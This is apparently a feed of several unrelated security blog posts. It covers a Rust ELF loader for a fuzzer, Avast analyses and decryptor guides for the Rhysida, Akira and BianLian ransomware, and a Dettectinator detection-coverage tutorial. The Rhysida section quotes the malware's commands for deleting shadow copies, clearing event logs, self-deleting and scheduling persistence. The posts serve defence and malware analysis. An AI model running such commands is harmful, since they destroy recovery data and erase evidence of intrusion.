// At this point, we have all the information we need to calculate the total
// length of the stack. We're missing the argv pointers and finally argc
let mut stack_length = stack_data.len();

// Add argv pointers
stack_length += args.len() * POINTER_SIZE;

// Add argc
stack_length += std::mem::size_of::<u64>();

Next, we start at the bottom of the stack and create a movable offset which will track through the stack stopping at the beginning of each string so that we can calculate its absolute address. The offset represents how deep into the stack from the top we are. At first, the offset is the largest value it can be because it’s at the bottom of the stack (higher-memory address). We subtract from it in order to point us towards the beginning of each argv string we pushed onto the stack. So the bottom of the stack looks something like this:

NULL
string_1
string_2
end-marker <--- offset

So armed with the arguments and their lengths that we recorded, we can adjust the offset each time we iterate through the argument lengths to point to the beginning of the strings. There is one gotcha though, on the first iteration, we have to account for the end-marker and its 8-bytes. So this is how the logic goes:

// Right now our offset is at the bottom of the stack, for the first
// argument calculation, we have to accomdate the "end-marker" that we added
// to the stack at the beginning. So we need to move the offset up the size
// of the end-marker and then the size of the argument itself. After that,
// we only have to accomodate the argument lengths when moving the offset
for (idx, arg_len) in arg_lens.iter().enumerate() {
    // First argument, account for end-marker
    if idx == 0 {
        curr_offset -= arg_len + U64_SIZE;
    }
    
    // Not the first argument, just account for the string length
    else {
        curr_offset -= arg_len;
    }
    
    // Calculate the absolute address
    let absolute_addr = (stack_addr + curr_offset) as u64;

    // Push the absolute address onto the stack
    push_u64(&mut stack_data, absolute_addr);
}

It’s pretty cool! And it seems to work? Finally we cap the stack off with argc and we are done populating all of the stack data in a vector. Next, we’ll want to actually copy the data onto the stack allocation which is straightforward so no code snippet there.

The last piece of information I think worth noting here is that I created a constant called STACK_DATA_MAX and the length of the stack data cannot be more than that tunable value. We use this value to set up RSP when we jump to the program in memory and start executing. RSP is set so that it is at the absolute lowest address possible, which is the stack allocation size - STACK_DATA_MAX. This way, when the stack grows, we have left the maximum amount of slack space possible for the stack to grow into since the stack grows down in memory.

Executing the Loaded Program

Everything at this point should be setup perfectly in memory and all we have to do is jump to the target code and start executing. For now, I haven’t fleshed out a context switching routine or anything we’re literally just going to jump to the program and execute it and hope everything goes well. The code I used to achieve this is very simple:

pub fn start_bochs(bochs: Bochs) {
    // Set RAX to our jump destination which is the program entry, clear RDX,
    // and set RSP to the correct value
    unsafe {
        asm!(
            "mov rax, {0}",
            "mov rsp, {1}",
            "xor rdx, rdx",
            "jmp rax",
            in(reg) bochs.entry,
            in(reg) bochs.rsp,
        );
    }
}

The reason we clear RDX is because if the _start routine sees a non-zero value in RDX, it will interpret that to mean that we are attempting to register a hook located at the address in RDX to be invoked when the program exits, we don’t have one we want to run so for now we NULL it out. The other register values don’t really matter. We move the program entry point into RAX and use it as a long jump target and we supply our handcrafted RSP so that the program has a stack to use to do its relocations and run properly.

dude@lol:~/lucid/target/release$ ./lucid --bochs-args -AAAAA -BBBBBBBBBB
[17:43:19] lucid> Loading Bochs...
[17:43:19] lucid> Bochs loaded { Entry: 0x19F50, RSP: 0x7F513F11C000 }
Argument count: 3
Args:
   -./bochs
   --AAAAA
   --BBBBBBBBBB
Test alive!
Test alive!
Test alive!
Test alive!
Test alive!
Test alive!
dude@lol:~/lucid/target/release$ 

The program runs, parses our command line args, and exits all without crashing! So it looks like everything is good to go. This would normally be a good stopping place, but I was morbidly curious…

Will Bochs Run?

We have to see right? First we have to compile Bochs as a -static-pie ELF which was a headache in itself, but I was able to figure it out.

ude@lol:~/lucid/target/release$ ./lucid --bochs-args -AAAAA -BBBBBBBBBB
[12:30:40] lucid> Loading Bochs...
[12:30:40] lucid> Bochs loaded { Entry: 0xA3DB0, RSP: 0x7FEB0F565000 }
========================================================================
                        Bochs x86 Emulator 2.7
              Built from SVN snapshot on August  1, 2021
                Timestamp: Sun Aug  1 10:07:00 CEST 2021
========================================================================
Usage: bochs [flags] [bochsrc options]

  -n               no configuration file
  -f configfile    specify configuration file
  -q               quick start (skip configuration interface)
  -benchmark N     run Bochs in benchmark mode for N millions of emulated ticks
  -dumpstats N     dump Bochs stats every N millions of emulated ticks
  -r path          restore the Bochs state from path
  -log filename    specify Bochs log file name
  -unlock          unlock Bochs images leftover from previous session
  --help           display this help and exit
  --help features  display available features / devices and exit
  --help cpu       display supported CPU models and exit

For information on Bochs configuration file arguments, see the
bochsrc section in the user documentation or the man page of bochsrc.
00000000000p[      ] >>PANIC<< command line arg '-AAAAA' was not understood
00000000000e[SIM   ] notify called, but no bxevent_callback function is registered
========================================================================
Bochs is exiting with the following message:
[      ] command line arg '-AAAAA' was not understood
========================================================================
00000000000i[SIM   ] quit_sim called with exit code 1

Bochs runs! It couldn’t make sense of our non-sense command line arguments, but we loaded it and ran it successfully.

Next Steps

The very next step and blog post will be developing a context-switching routine that we will use to transition between Fuzzer execution and Bochs execution. This will involve saving our state each time and function basically the same way a normal user-to-kernel context switch functions.

After that, we have to get very familiar with Bochs and attempt to get a target up and running in vanilla Bochs. Once we do that, we’ll try to run that in the Fuzzer.

Resources

  • I used this excellent blogpost from Faster Than Lime a lot when learning about how to load ELFs in memory: https://fasterthanli.me/series/making-our-own-executable-packer/part-17.
  • Also shoutout @netspooky for helping me understand the stack layout!
  • Thank you to ChatGPT as well, for being my sounding board (even if you failed to help me with my stack creation bugs)

Code

https://github.com/h0mbre/Lucid

Rhysida Ransomware Technical Analysis

Rhysida is a new ransomware strain that emerged in the second quarter of 2023. The first mention of the Rhysida ransomware was in May 2023 by MalwareHunterTeam (sample’s timestamp is May 16, 2023). As of Oct 12, the ransomware’s leak site contains a list of over 50 attacked organizations of all types, including government, healthcare, and IT.

Screenshot of the Rhysida data leak site as of Oct 16, 2023 

Victims of the Rhysida ransomware can contact Avast experts directly at decryptors-at-avast-dot-com for a free consultation about how to mitigate damage caused by the attack. 

Analysis of the Rhysida encryptor 

The Rhysida encryptor comes as a 32-bit or 64-bit Windows PE file, compiled by MinGW GNU version 6.3.0 and linked by the GNU linker v 2.30. The first public version comes as a debug version, which makes its analysis easier. 

For cryptographic operations, Rhysida uses the LibTomCrypt library version 1.18.1. For multi-threaded and synchronization operations, Rhysida uses the winpthreads library. Chacha20 pseudo-random number generator is used for generating random numbers, such as AES encryption key, AES initialization vector and random padding for RSA-OAEP encryption. The public RSA key is hard-coded in the binary (ASN1-encoded) and loaded using the rsa_import function. Each sample has different embedded RSA key. 

The encryptor executable supports the following command line arguments: 

  • -d Specifies a directory name to encrypt. If omitted, all drives (identified by letters) are encrypted 
  • -sr Enables self-remove after file encryption 
  • -nobg Disables setting desktop background 
  • -S When present, Rhysida will create a scheduled task, executing at OS startup under the System account 
  • -md5 When present, Rhysida will calculate MD5 hash of each file before it is encrypted. However, this feature is not fully implemented yet – the MD5 is calculated, but it’s not used anywhere later. 

When executed, the encryptor queries the number of processors in the system. This value serves for: 

  • Allocating random number generators (one per processor) 
  • Creating Encryptor threads (one per processor) 
Initialization for multi-threaded encryption 

Furthermore, Rhysida creates a File Enumerator thread, which searches all available disk drives by letter. Binaries prior July 2023 enumerate drives in normal order (from A: to Z:); binaries built after July 1st enumerate drives in reverse order (from Z: to A:). 

The File Enumerator thread searches for files to encrypt and puts them into a synchronized list, ready to be picked by one of the Encryptor threads. Files in system critical folders, and files necessary to run operating systems and programs, are excluded from encryption. 

List of skipped directories: 

  • /$Recycle.Bin 
  • /Boot 
  • /Documents and Settings 
  • /PerfLogs 
  • /Program Files 
  • /Program Files (x86)
  • /ProgramData 
  • /Recovery 
  • /System Volume Information  
  • /Windows 
  • /$RECYCLE.BIN

List of skipped file types:

  • .bat 
  • .bin 
  • .cab 
  • .cd 
  • .com 
  • .cur 
  • .dagaba 
  • .diagcfg 
  • .diagpkg 
  • .drv 
  • .dll 
  • .exe 
  • .hlp 
  • .hta 
  • .ico 
  • .lnk 
  • .msi 
  • .ocx
  • .ps1 
  • .psm1 
  • .scr 
  • .sys 
  • .ini 
  • Thumbs.db 
  • .url 
  • .iso 

Additionally, the ransom note file, usually named CriticalBreachDetected.pdf, is excluded from the list of encrypted files. The PDF content of the ransom note file is hard-coded in the binary and is dropped into each folder. The following picture shows an example of the ransom note from a September version of the ransomware:

In addition to dropping the ransom note, if enabled in the configuration, Rhysida generates a JPEG picture, which is stored into C:/Users/Public/bg.jpg. Earlier version of the ransomware generated the image with unwanted artifacts, which was fixed in later builds of Rhysida. The following picture shows an example of such JPEG pictures: 

The picture is set as the desktop background on the infected device. For that purpose, a set of calls to an external process via system (a C equivalent of CreateProcess) is used: 

Rhysida may or may not (depending on the configuration and binary version) execute additional actions, including: 
 

  • Delete shadow copies using: 
     
    cmd.exe /c vssadmin.exe Delete Shadows /All /Quiet 
     
  • Delete the event logs with this command: 
     
    cmd.exe /c for /F "tokens=*" %1 in ('wevtutil.exe el') DO wevtutil.exe cl "%1"
  • Delete itself via Powershell command 
     
    cmd.exe /c start powershell.exe -WindowStyle Hidden -Command Sleep -Milliseconds 500; Remove-Item -Force -Path "%BINARY_NAME%” -ErrorAction SilentlyContinue; 
     
  • (Re-)create scheduled task on Windows startup: 
     
    cmd.exe /c start powershell.exe -WindowStyle Hidden -Command “Sleep -Milliseconds 1000; schtasks /end /tn Rhsd; schtasks /delete /tn Rhsd /f; schtasks /create /sc ONSTART /tn Rhsd /tr \” 
     
  • Remove scheduled task using: 
     
    cmd.exe /c start powershell.exe -WindowStyle Hidden -Command "Sleep -Milliseconds 1000; schtasks /delete /tn Rhsd /f;" 

How Rhysida encrypts files 

To achieve the highest possible encryption speed, Rhysida’s encryption is performed by multiple Encryptor threads. Files bigger than 1 MB (1048576 bytes) are divided to 2-4 blocks and only 1 MB of data is encrypted from each block. The following table shows an overview of the number of blocks, size of one block and length of the encrypted part: 

File SizeBlock CountBlock SizeEncrypted Length
0 – 1 MB1(whole file)(whole block)
1 – 2 MB 1(whole file)1048576
2 – 3 MB2File Size / 21048576
3 – 4 MB 3File Size / 31048576
> 4MB 4File Size / 41048576
Table 1: File sizes, block counts, block lengths and encrypted lengths. 

Multiple steps are performed to encrypt a file: 

  • The file is renamed to have the “.rhysida” extension. 
  • The file size is obtained by the sequence below. Note that earlier versions of the ransomware contain a bug, which causes the upper 32 bits of the file size to be ignored. In later versions of Rhysida, this bug is fixed. 
  • Based on the file size, Rhysida calculates counts and length shown in Table 1. 
  • 32-byte file encryption key and 16-byte initialization vector for AES-256 stream cipher is generated using the random number generator associated with the Encryptor thread.  
  • Files are encrypted using AES-256 in CTR mode
  • Both file encryption key and the IV are encrypted by RSA-4096 with OAEP padding and stored to the file tail structure. 
  • This file tail is appended to the end of the encrypted file: 

Conclusion 

Rhysida is a relatively new ransomware, but already has a long list of attacked organizations. As of October 2023, it is still in an active development.  

Victims of the Rhysida ransomware may contact us at decryptors-at-avast-dot-com for a consultation about how to mitigate damage caused by the attack. 

The post Rhysida Ransomware Technical Analysis appeared first on Avast Threat Labs.

Decrypted: Akira Ransomware

Researchers for Avast have developed a decryptor for the Akira ransomware and released it for public download. The Akira ransomware appeared in March 2023 and since then, the gang claims successful attacks on various organizations in the education, finance and real estate industries, amongst others.

Skip to how to use the Akira Ransomware Decryptor

Note that this ransomware is not related to the Akira ransomware discovered by Karsten Hahn in 2017 and our decryptor cannot be used to decrypt files from this old variant.

The Akira ransomware comes as a 64-bit Windows binary written for Windows operating system. It is written in C++ with heavy support from C++ libraries. Additionally, Boost library was used to implement the asynchronous encryption code. The binary is linked by Microsoft Linker version 14.35. 

In June 2023, a security researcher rivitna published a sample that is compiled for Linux. The Linux version is 64-bit and uses the Boost library. 

Akira Encryption Schema 

During the run, the ransomware generates a symmetric encryption key using CryptGenRandom(), which is the random number generator implemented by Windows CryptoAPI. Files are encrypted by Chacha 2008 (D. J. Bernstein’s implementation).  

The symmetric key is encrypted by the RSA-4096 cipher and appended to the end of the encrypted file. Public key is hardcoded in the ransomware binary and differs per sample. 

Exclusion List 

When searching files for encryption, Akira is not especially fussy. Whilst ransomware strains usually have a list of file types to encrypt, Akira has a list of files not to encrypt: 

  • .exe 
  • .dll 
  • .lnk 
  • .sys 
  • .msi 
  • akira_readme.txt 

Furthermore, there are folders that are always ignored by Akira: 

  • winnt 
  • temp 
  • thumb
  • $Recycle.Bin 
  • $RECYCLE.BIN 
  • System Volume Information 
  • Boot 
  • Windows 
  • Trend Micro 

There is even the legacy winnt folder, which was used as default folder for installation of Windows 2000. 

Encryption Schema for Small Files 

Files are encrypted depending on their size. For files of 2,000,000 bytes and smaller, the ransomware encrypts the first half of the file. The structure of such an encrypted file is as follows: 

Block typeSize
Encrypted BlockFile Size / 2
Plain Text BlockFile Size / 2
File Footer534 bytes

Encryption Schema for Large Files

For files sizes greater than 2,000,000 bytes, Akira encrypts four blocks. First, the size of a full block is calculated (see Figure 1).

Figure 1: Akira’s calculation of full encryption block size.

The size of the encrypted part of the block is then calculated (see Figure 2).

Figure 2: Akira’s calculation of the size of encryption portion of block.

The layout of an encrypted file is then created (see Figure 3).

Block typeSize
Encrypted Block #1EncryptedLength
Plain Text BlockBlockLength – EncryptedLength
Encrypted Block #2EncryptedLength
Plain Text BlockBlockLength – EncryptedLength
Encrypted Block #3EncryptedLength
Plain Text BlockBlockLength – EncryptedLength
Encrypted Block #4EncryptedLength
Plain Text BlockRest of the file
File Footer534 bytes
Figure 3: Layout of encrypted file.

The structure of the file footer can be described by the following structure in C language:

Figure 4: File footer structure.

Encrypted files can be recognized by the extension .akira. A file named akira_readme.txt – the ransom note – is dropped in each folder (see Figure 5).

Figure 5: Akira ransom note file.

The ransom note mentions two TOR sites. In the first one (Figure 6), the user can list the hacked companies; in the second, victims are instructed on how to make payment (Figure 7).

Figure 6: TOR site listing and describing victim company.
Figure 7: Akira TOR site instructing victim on how to pay ransom.

Linux Version of Akira

The Linux version of the Akira ransomware works identically like its Windows counterpart. Encrypted files have the same extension and the same encryption schema. Obviously, Windows CryptoAPI is not available on Linux, so the ransomware authors used Crypto++ library to cover the parts that are handled by CryptoAPI in Windows.

Our team is currently developing a Linux version of our decryptors. In the meantime, the Windows version of the decryptor can be used to decrypt files encrypted by the Linux version of the ransomware. Please use WINE layer to run the decryptor under Linux.

Similarities to Conti

Akira has a few similarities to the Conti v2 ransomware, which may indicate that the malware authors were at least inspired by the leaked Conti sources. Commonalities include:

  1. List of file type exclusions. Akira ignores files with the same extensions as Conti, except that there’s akira_readme.txt instead of R3ADM3.txt.
  2. List of directory exclusions. Again, Akira ignores the same folders as Conti, including winnt and Trend Micro, which makes Trend Micro’s default installation folder especially resilient against both ransomware strains.
  3. The structure of the Akira file tail is equal to the file tail appended by Conti (see Figure 8)
Figure 8: Conti ransomware file tail.

The member variable bEncryptType is set to 0x24, 0x25, 0x26 by Conti version 2, Akira uses 0x32.

  1. The implementation of ChaCha 2008 used by Akira ransomware is the same as the one used by Conti ransomware.
  2. The code for key generation (two calls to CryptGenRandom followed by CryptEncrypt) resembles Conti’s key generation function.

How to use the Avast decryption tool to decrypt files encrypted by the ransomware

Please, read the instructions carefully. The decryption success rate will depend on it. If you don’t like reading manuals, at least read the instructions about the file pair.

1. The first step is to download the decryptor binary. Avast provides a 64-bit decryptor, as the ransomware is also a 64-bit and can’t run on 32-bit Windows. If you have no choice but to use 32-bit applications, you may download 32-bit decryptor here.

2. Run the executable file, preferably as an administrator. It starts as a wizard, leading you through the configuration of the decryption process.

3. On the initial page, we have a link to the license information. Click the Next button when you are ready to start.

4. On the next page, select the list of locations you want to be searched for and decrypted. By default, it has a list of all local drives:

5. On the following page, you need to supply an example of a file in its original form and then one encrypted by Akira ransomware. Type both names of the files. You can also drag & drop files from Windows Explorer to the wizard page.

It is extremely important to pick a pair of files that are as big as you can find. Due to Akira’s block size calculation, there may be dramatic difference on the size limit even for files that differ by a size of 1 byte.

When you click Next, the decryption tool will carefully examine the file pair and tells you what the biggest decryptable file is. In general, the size limit should be the same as the size of the original file:

6. The next page is where the password cracking process takes place. Click Start when you are ready to begin. This process usually only takes a few seconds but will require a large amount of system memory. This is why we strongly recommend using the 64-bit version of the decryption tool.

Once the password is found, you can continue to decrypt all the encrypted files on your PC by clicking Next.

7. On the final page, you can opt-in to back up your encrypted files. These backups may help if anything goes wrong during the decryption process. This choice is selected by default, which we recommend. After clicking Decrypt the decryption process begins. Let the decryptor work and wait until it finishes decrypting all of your files.

For questions or comments about the Avast decryptor, email [email protected].

IOCs (indicators of compromise)

Windows versions

3c92bfc71004340ebc00146ced294bc94f49f6a5e212016ac05e7d10fcb3312c
5c62626731856fb5e669473b39ac3deb0052b32981863f8cf697ae01c80512e5
678ec8734367c7547794a604cc65e74a0f42320d85a6dce20c214e3b4536bb33
7b295a10d54c870d59fab3a83a8b983282f6250a0be9df581334eb93d53f3488
8631ac37f605daacf47095955837ec5abbd5e98c540ffd58bb9bf873b1685a50
1b6af2fbbc636180dd7bae825486ccc45e42aefbb304d5f83fafca4d637c13cc
9ca333b2e88ab35f608e447b0e3b821a6e04c4b0c76545177890fb16adcab163
d0510e1d89640c9650782e882fe3b9afba00303b126ec38fdc5f1c1484341959
6cadab96185dbe6f3a7b95cf2f97d6ac395785607baa6ed7bf363deeb59cc360

Linux version

1d3b5c650533d13c81e325972a912e3ff8776e36e18bca966dae50735f8ab296

The post Decrypted: Akira Ransomware appeared first on Avast Threat Labs.

Decrypted: BianLian Ransomware

The team at Avast has developed a decryptor for the BianLian ransomware and released it for public download. The BianLian ransomware emerged in August 2022, performing targeted attacks in various industries, such as the media and entertainment, manufacturing and healthcare sectors, and raised the threat bar by encrypting files at high speeds.

Skip to how to use the BianLian ransomware decryptor

Static analysis of BianLian ransomware 

BianLian is a ransomware strain written in Go language and compiled as a 64-bit Windows executable. Due to the nature of the Go language, there are many strings directly visible in the binary, including details about the directory structure of the author’s PC: 

There are references to asymmetric cryptography libraries in the sample (RSA and elliptic curves), but the ransomware doesn’t do any of it. File data is encrypted with AES-256 in CBC mode. The length of the encrypted data is aligned to 16 bytes, as required by the AES CBC cipher. 

BianLian ransomware behavior 

Upon its execution, BianLian searches all available disk drives (from A: to Z:). For all found drives, it searches all files and encrypts all whose file extension matches one of the 1013 extensions hardcoded in the ransomware binary. 

Interestingly enough, the ransomware doesn’t encrypt the file from the start nor does it encrypt a file to the end. Instead, there is a fixed file offset hardcoded in the binary from which the encryption proceeds. The offset differs per sample, but none of the known samples encrypts data from the start of the file. 

After data encryption, the ransomware appends the .bianlian extension and drops a ransom note called Look at this instruction.txt into each folder on the PC (see Figure 1).

Figure 1: Screenshot of the ransom note

When the encryption is complete, the ransomware deletes itself by executing the following command: 

cmd /c del <sample_exe_name> 

Parameters of the decryptor 

The decryptor can only restore files encrypted by a known variant of the BianLian ransomware. For new victims, it may be necessary to find the ransomware binary on the hard drive; however, because the ransomware deletes itself after encryption, it may be difficult to do so. According to Avast telemetry, common names of the BianLian ransomware file on the victim’s PC include: 

  • C:\Windows\TEMP\mativ.exe 
  • C:\Windows\Temp\Areg.exe 
  • C:\Users\%username%\Pictures\windows.exe 
  • anabolic.exe

When searching for the ransomware binary, we recommend looking for an EXE file in a folder which doesn’t typically contain executables, such as %temp%, Documents or Pictures. It is also recommendable to check the virus vault of your antivirus. The typical size of the BianLian ransomware executable is around 2 MB.  

Should you find a sample of the BianLian ransomware, you can inform us at [email protected]. We are actively looking for new samples and update the decryptor accordingly. 

How to use the Avast decryption tool to decrypt files encrypted by the ransomware 

Follow these steps to decrypt your files: 

1) Download the free decryptor

2) Run the executable file. It starts as a wizard, leading you through the configuration of the decryption process.

3) On the initial page, we have a link to the license information. Click the Next button, when you are ready to start.

4) On the next page, select the list of locations you want to be searched and decrypted. By default, it contains a list of all local drives:

5) On the third page, you need to provide a file in its original form and encrypted by the BianLian ransomware. Enter both names of the files. You can also drag & drop a file from Windows Explorer to the wizard page.

6) If you have an encryption password created by a previous run of the decryptor, you can select I know the password for decrypting files option:

7) The next page is where the password cracking process takes place. Click Start when you are ready to start the process. The password cracking process tries all known BianLian passwords to determine the right one.

8) Once the password is found, you can proceed to decrypt all the encrypted files on your PC by clicking Next

9) On the final page, you can opt-in to back up your encrypted files. These backups may help if anything goes wrong during the decryption process. This option is on by default, which we recommend. After clicking Decrypt the decryption process begins. Let the decryptor work and wait until it finishes decrypting all of your files. 

For questions or comments about the Avast decryptor, email [email protected].

IOCs: 

SHA256
1fd07b8d1728e416f897bef4f1471126f9b18ef108eb952f4b75050da22e8e43
3a2f6e614ff030804aa18cb03fcc3bc357f6226786efb4a734cbe2a3a1984b6f
46d340eaf6b78207e24b6011422f1a5b4a566e493d72365c6a1cace11c36b28b
3be5aab4031263529fe019d4db19c0c6d3eb448e0250e0cb5a7ab2324eb2224d
a201e2d6851386b10e20fbd6464e861dea75a802451954ebe66502c2301ea0ed
ae61d655793f94da0c082ce2a60f024373adf55380f78173956c5174edb43d49
eaf5e26c5e73f3db82cd07ea45e4d244ccb3ec3397ab5263a1a74add7bbcb6e2

The post Decrypted: BianLian Ransomware appeared first on Avast Threat Labs.

DeTT&CT: Automate your detection coverage with dettectinator

Introduction

Last year, I published an article on mapping detection to the MITRE ATT&CK framework using DeTT&CT. In the article, we introduced DeTT&CT and explored its features and usage. If you missed it, you can find the article here.

Although, after writing that article, I encountered some challenges. For instance, I considered using DeTT&CT in a production environment but there were hundreds of existing detection rules to consider, and it would have been a tedious process to manually create the necessary YAML file for building a detection coverage layer. As a result, I decided not to use DeTT&CT and instead focused on increasing detection in other ways.
Fortunately, a new tool called Dettectinator has recently been released. Its purpose is to address these kinds of issues and make it easier to automate detection coverage.

In this article, we will explore Dettectinator, its features, and walk through the steps to automate the detection coverage for Sentinel Analytics rules and Elastic detection rules.

What is dettectinator

Dettectinator is a tool developed by Martijn Veken and Ruben Bouman of Sirius Security that enables the automation of DeTT&CT data source and technique administration YAML files needed to create visibility and detection layers in the ATT&CK Navigator. This tool can be integrated as a Python library within your security operations center (SOC) automation tools or used via the command line.

To use the Python library, install it with “pip install dettectinator” and import one of the following classes into your code:

  • DettectDataSourcesAdministration
  • DettectTechniquesAdministration

These classes allow you to programmatically edit DeTT&CT YAML files, including creating new data source and techniques administration files and modifying existing ones.

from dettectinator import DettectDataSourcesAdministration
from dettectinator import DettectTechniquesAdministration

# Open an existing YAML file:
dettect_ds = DettectDataSourcesAdministration('data_sources.yaml')

# Or create a new YAML file:
dettect_ds = DettectDataSourcesAdministration()

# Open an existing YAML file:
dettect = DettectTechniquesAdministration('techniques.yaml')

# Or create a new YAML file:
dettect = DettectTechniquesAdministration()

To run as a CLI tool:

$ python dettectinator.py

Please specify a valid data import plugin using the "-p" argument:
 - DatasourceCsv
 - DatasourceDefenderEndpoints
 - DatasourceExcel
 - DatasourceWindowsSecurityAuditing
 - DatasourceWindowsSysmon
 - TechniqueCsv
 - TechniqueDefenderAlerts
 - TechniqueDefenderIdentityRules
 - TechniqueElasticSecurityRules
 - TechniqueExcel
 - TechniqueSentinelAlertRules
 - TechniqueSigmaRules
 - TechniqueSplunkConfigSearches
 - TechniqueSuricataRules
 - TechniqueSuricataRulesSummarized
 - TechniqueTaniumSignals
$ python3 dettectinator.py -p TechniqueElasticSecurityRules -h

Plugin "TechniqueElasticSecurityRules" has been found.
usage: dettectinator.py [-h] [-c CONFIG] -p PLUGIN -a APPLICABLE_TO [-d {enterprise,ics,mobile}] [-i INPUT_FILE] [-o OUTPUT_FILE] [-n NAME] [-s STIX_LOCATION] [-ch] [-cl] [-ri RE_INCLUDE] [-re RE_EXCLUDE]
                        [-l LOCATION_PREFIX] [-clp] --host HOST --user USER --password PASSWORD [--filter FILTER]

Dettectinator provides a range of plugins for various detection systems and data source platforms, and you can even create custom plugins to suit your specific workflow. Some of the available plugins for detection include:

  • Microsoft Sentinel: Analytics Rules (API)
  • Microsoft Defender: Alerts (API)
  • Microsoft Defender for Identity: Detection Rules (loaded from MS Github)
  • Tanium: Signals (API)
  • Elastic Security: Rules (API)
  • Suricata: rules (file)
  • Suricata: rules summarized (file)
  • Sigma: rules (folder with YAML files)
  • Splunk: saved searches config (file)
  • CSV: any csv with detections and ATT&CK technique ID’s (file)
  • Excel: any Excel file with detections and ATT&CK technique ID’s (file)

Plugins for data sources include:

  • Defender for Endpoints: tables available in Advanced Hunting (based on OSSEM)
  • Windows Sysmon: event logging based on Sysmon (based on OSSEM and your Sysmon config file)
  • Sentinel Window Security Auditing: event logging (based on OSSEM and EventID’s found in your logging)
  • CSV: any csv with ATT&CK data sources and products (file)
  • Excel: any Excel file with ATT&CK data sources and products (file)

It’s easy to create your own Dettectinator plugins or edit the ones provided to cover additional scenarios. An instruction on how to create your own plugins can be found here.

Dettectinator can be seamlessly integrated into your detection engineering workflow, as illustrated in the picture below. Steps 1 and 3 can be automated using version control system (VCS) pipelines or scheduling. The analyst can enhance the techniques identified by Dettectinator by assigning appropriate scores, resulting in an enriched YAML file that can be used in future runs of the tool.

Dettectinator workflow
Figure 1: Dettectinator workflow

How to use dettectinator

To illustrate how to use Dettectinator from a production environment, we will walk through the steps to build your coverage from Elastic Security detection rules and Microsoft Sentinel analytics rules.

Let’s start with Elastic Security. As shown in the picture below, we enabled the built-in detection rules from Elastic which represent 724 rules in total.

Elastic Security detection rules
Figure 2: Elastic Security detection rules

Ensure that the Elastic user has the appropriate permissions to manage/read the detection rules. Refer to the Elastic documentation for more information.

In our testing environment, we created a dedicated user and assigned it a custom role (as shown in the highlighted parameters):

Elastic detection permissions role
Figure 3: Elastic detection permissions role

With the command below, we will generate the technique administration YAML file which we will use to create the ATT&CK Navigator layer:

$ python3 dettectinator.py -p TechniqueElasticSecurityRules -a Windows -d enterprise -o elasticrules_techniques.yaml –host “<URL>:<Port>” --user <username> --password <password>  
  • -p: specify the plugin
  • -a: Systems that the detections are applicable to (comma separated list)
  • -d: ATT&CK domain to use {enterprise, ics, mobile} (default = enterprise)
  • -o: YAML filename for output
  • –host: Elastic Security host
  • –user: Elastic Security username
  • –password: Elastic Security user’s password
Dettectinator Elastic Security Rules plugin
Figure 4: Dettectinator Elastic Security Rules plugin

Using the DeTT&CT Editor, we were able to modify the technique administration YAML file. Alternatively, we could use the output to generate a detection ATT&CK Navigator layer through the DeTT&CT Command Line Interface (CLI).

DeTT&CT Editor
Figure 5: DeTT&CT Editor

To generate the detection layer, we used the following command:

$ python3 dettect.py d -ft <YAML file generated by dettectinator> -l
  • d: detection coverage mapping based on techniques
  • -ft: path of the technique administration YAML file
  • -l: generate a data source layer for the ATT&CK Navigator

The tool dettect.py generated a JSON file that can be opened within ATT&CK Navigator.

In this case, we get a quick overview of the built-in Elastic Security detection rules. All techniques are assigned a default score of ‘1’ by dettectinator. This scoring can be customized using the DeTT&CT Editor.

Detection coverage layer
Figure 6: Detection coverage layer

When hovering over the ATT&CK techniques and sub-techniques, additional information such as related detection rules and comments generated by dettectinator will appear.

Here is an example for the technique Lateral Tool Transfer (T1570):

Detection layer - details
Figure 7: Detection layer – details

Now, let’s check the detection coverage from an existing Microsoft Sentinel environment with Analytics rules.  In our testing example, we created an “App Registration” in Azure and granted it the following permissions:

App Registration permissions
Figure 8: App Registration permissions

Since we are using delegated permissions, we also had to enable “Allow public client flows” in the Authentication settings for the App Registration.

To generate the technique administration YAML for Microsoft Sentinel, we used the following command:

$ python3 dettectinator.py -p TechniqueSentinelAlertRules -a Windows -o sentinel_techniques.yaml --subscription_id <subscription_id> --resource_group <resource group name> --workspace <workspace name> --tenant_id <tenant_id> --app_id <app_id>
Dettectinator - Microsoft Sentinel Techniques
Figure 9: Dettectinator – Microsoft Sentinel Techniques

Dettectinator generated a JSON file containing information about a single technique. As shown in the picture below, our test Microsoft Sentinel environment contains 5 analytics rules, but only one of them as a technique specified in the metadata. As a result, Dettectinator was able to map the analytic rules to only one technique (T1190).

Microsoft Sentinel Analytics Rules
Figure 10: Microsoft Sentinel Analytics Rules
Microsoft Sentinel detection coverage
Figure 11: Microsoft Sentinel detection coverage

Conclusion

Dettectinator is a highly efficient tool that can help you optimize your detection engineering processes. By automating certain tasks, it frees up your time and resources to focus on more complex, high-level tasks.

When used in conjunction with DeTT&CT, it provides a real-time overview of your current detection coverage, giving you a clear understanding of your strengths and areas for improvement. Additionally, Dettectinator comes equipped with a range of integrations that are suitable for a variety of environments, making it a versatile and efficient tool.

In addition to its automation capabilities, Dettectinator is also highly customizable. It allows you to tailor its functionality to meet the specific needs of your organization or project.

One of the key benefits of using Dettectinator is its ability to save users a considerable amount of time. It complements DeTT&CT by addressing some of the challenges that users may face, making it an invaluable addition to any detection engineering workflow. In short, if you’re looking to streamline your detection processes and improve your coverage, Dettectinator is an excellent tool to consider.

References

“Dettectinator”, https://github.com/siriussecurity/dettectinator

“Releasing Dettectinator”, https://www.siriussecurity.nl/blog/2022/11/03/releasing-dettectinator

“DeTT&CT : Mapping detection to MITRE ATT&CK”, https://blog.nviso.eu/2022/03/09/dettct-mapping-detection-to-mitre-attck/

“rabobank-cdc/DeTTECT: Detect Tactics, Techniques & Combat Threats”, https://github.com/rabobank-cdc/DeTTECT

“ATT&CK® Navigator“, https://mitre-attack.github.io/attack-navigator/

About the author

Renaud Frère
Renaud Frère

Renaud is an Incident Response Consultant within the CSIRT team at NVISO with a focus on digital forensics including mobile device forensics. He is also involved in various projects related to Threat Hunting, Detection Engineering and Threat Intelligence. Occasionally, Renaud likes to participate in DFIR CTFs and Netwars.

Advanced Phobia

By: Ylabs
Reading Time: 8 minutes Ransomware Gang Details Phobos ransomware, first discovered in December 2018, is another notorious cyber threat actor which targets businesses. Phobos is popular among threat actors because of its simple design. In addition, the Greek god Phobos was thought to be the incarnation of fear and panic: the gang’s name was likely inspired by him. Phobos […]

Phobia

By: Ylabs
